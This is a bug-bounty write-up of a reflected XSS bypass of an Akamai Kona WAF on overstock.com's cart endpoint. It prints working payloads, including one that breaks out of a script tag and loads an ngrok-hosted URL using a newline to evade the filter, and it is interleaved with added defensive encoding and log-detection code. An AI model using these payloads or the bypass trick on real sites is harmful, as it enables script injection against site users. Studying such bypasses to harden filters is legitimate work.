How I bypassed the AKAMAI KONA WAF: XSS in overstock.com!

This target is in a Bugcrowd program. I used it for my research on XSS (cross-site scripting), to learn how the WAF works.

I found the endpoint with a Google dork (use your brain), and came up with this vulnerable URL:

https://www.overstock.com/cart?TID=INJECTED_XSS

This target is protected with:

AKAMAI KONA WAF + XSS HEADER PROTECTION

First I checked where our script is reflected, using view-source.

We can see “crot” reflected there (I don't know what that array or fucking object is). Now I try “</script></body>” to escape the <script> and <body> in overstock.

Yay!!! Our payload successfully escaped that.
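The reflection above is a JavaScript-context injection: the TID value lands inside an inline script, so a value containing `</script>` ends the script element before the JS engine ever runs. As an added example (not code from the original post, and not Overstock's code), the snippet below shows the vulnerable string-concatenation pattern next to the hardened one, which serialises the value as a JSON string literal and escapes `</` so the HTML tokenizer can never see a second closing tag. The function names, the `page.TID` layout and the sample input are assumptions constructed for the demo.

```javascript
// Added example (not from the original post): safely embedding a request
// parameter such as TID inside an inline <script> block.
//
// The HTML tokenizer scans script content for "</script" before any JS is
// parsed, so the fix is output encoding for the JavaScript context, not a
// WAF signature.

// Vulnerable pattern (hypothetical, modelled on the reflection in the post):
// untrusted input concatenated straight into script text.
function renderVulnerable(tid) {
  return `<script>var page = {"TID": "${tid}"};</script>`;
}

// Hardened pattern: JSON-encode, then neutralise "</", "<!--" and the two
// Unicode line separators that older JS engines treat as line terminators.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/<\//g, '<\\/')      // "</script" can no longer appear verbatim
    .replace(/<!--/g, '<\\!--')   // avoids <!-- ... --> script-data quirks
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function renderHardened(tid) {
  return `<script>var page = {"TID": ${jsStringLiteral(tid)}};</script>`;
}

// Does the rendered HTML contain a "</script" besides the legitimate
// trailing one? The HTML tokenizer matches this case-insensitively.
function breaksOutOfScript(html) {
  const matches = html.match(/<\/script/gi) || [];
  return matches.length > 1;
}

// Constructed input modelled on the reflection in the post (not a real
// request): a value that tries to close the script and body elements and
// ends with a newline instead of sitting flush against ">".
const sampleInput =
  '</script></body><body background="https://example.invalid/x"\n>';

// Stand-alone demo: the hardened output keeps the value intact for the JS
// engine (JSON.parse round-trips it) while the tokenizer sees one script.
console.log('vulnerable breaks out:', breaksOutOfScript(renderVulnerable(sampleInput)));
console.log('hardened breaks out:  ', breaksOutOfScript(renderHardened(sampleInput)));
console.log(renderHardened(sampleInput));
```

The encoding is lossless: `JSON.parse(jsStringLiteral(v))` returns `v` unchanged, because `\/` is a valid JSON escape. That is the property a WAF cannot give you; it only sees the request, never the context the value is rendered into.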

Every payload I could find about bypassing the “AKAMAI WAF”:

  • in Twitter posts:

@zseano

https://twitter.com/xsspayloads/status/1008573444840198144?lang=en

@brutelogic

https://twitter.com/brutelogic/status/586284524247584769

  • in a GitHub post:

\');confirm(1);//

  • on HackerOne

With all the tips I tried, I still couldn't bypass the Akamai WAF. So now I researched on my own :( I set up my XSS host (I used ngrok.io) to LISTEN for the response to my host, and as an example I used the “w3schools Tryit Editor” to test an HTML BODY tag that loads my XSS host.

and I tried the payload

<body background="ngrok.io/overstock">

See, my ngrok host gets a request from the w3schools page.

NOW TIME TO BYPASS THE AKAMAI KONA WAF IN OVERSTOCK

with my payload:

</script></body><body%20background=%27https://dfc26b38.ngrok.io/overstock%27%0a>

Why I used “%0a” at the end of the tag: the WAF still blocked my payload when the tag ended with “>”, so I added “\n” (URL-encoded as %0a) before it.
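The observation above is the kind of gap a defender wants to measure rather than guess at: a signature that expects the quoted attribute to sit flush against the closing `>` does not see a tag whose attribute is followed by a newline, even though the browser parses it the same way. As an added example (not from the original post, and not Akamai's or Overstock's rule set), the log review helper below URL-decodes each request's query string, runs a hypothetical "naive" rule that models that weakness, and then a rule that matches on the tag opener after whitespace has been collapsed. The three log lines, the `example.invalid` host, the `queryOf`/`normalize`/`reviewLog` names and the naive rule itself are all constructed for the demo.

```javascript
// Added example (not from the original post): why a signature anchored on
// how a tag ENDS misses the request in the post, and how decoding and
// whitespace normalisation close that gap. All log lines are constructed.

const sampleLogLines = [
  // benign request
  'GET /cart?TID=12345 HTTP/1.1',
  // tag closed with the quote flush against ">" (constructed)
  'GET /cart?TID=%3C/script%3E%3Cbody%20background=%27https://example.invalid/a%27%3E HTTP/1.1',
  // same request with a URL-encoded newline before ">" (constructed, as in the post)
  'GET /cart?TID=%3C/script%3E%3Cbody%20background=%27https://example.invalid/a%27%0a%3E HTTP/1.1',
];

// Pull the raw query string out of a "METHOD path?query HTTP/x" line.
function queryOf(line) {
  const m = line.match(/^\S+\s+\S*\?(\S*)\s/);
  return m ? m[1] : '';
}

// Decode once; leave malformed percent-sequences as-is rather than throwing.
function safeDecode(s) {
  try {
    return decodeURIComponent(s.replace(/\+/g, ' '));
  } catch (e) {
    return s;
  }
}

// Canonical form for matching: decoded, lower-cased, any run of whitespace
// (including the newline the post relies on) collapsed to one space.
function normalize(rawQuery) {
  return safeDecode(rawQuery).toLowerCase().replace(/\s+/g, ' ');
}

// Hypothetical model of a weak signature: a <body ...> tag whose last
// attribute quote is immediately followed by ">". This is NOT Akamai's rule;
// it only reproduces the behaviour the post observed.
function naiveRule(decoded) {
  return /<body[^>]*['"]>/i.test(decoded);
}

// Match on what the browser cares about, the tag opener, regardless of how
// the tag ends. A legitimate TID never contains a "</script" or "<body".
function robustRule(normalized) {
  return /<\/script|<body\b/.test(normalized);
}

function reviewLog(lines) {
  return lines.map((line) => {
    const q = queryOf(line);
    return {
      line,
      naive: naiveRule(safeDecode(q)),
      robust: robustRule(normalize(q)),
    };
  });
}

// Stand-alone demo: the newline variant is missed by the naive rule only.
for (const r of reviewLog(sampleLogLines)) {
  console.log(`naive=${r.naive} robust=${r.robust}  ${r.line}`);
}
```

The useful takeaway for a detection engineer is the pipeline, not the regex: decode, canonicalise whitespace and case, then match on the structural token (`</script`, `<body`) instead of on the exact bytes a tag happens to end with.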

Response on my ngrok.io:

XSS SUCCESS!

Follow my Twitter:

https://twitter.com/0ktavandi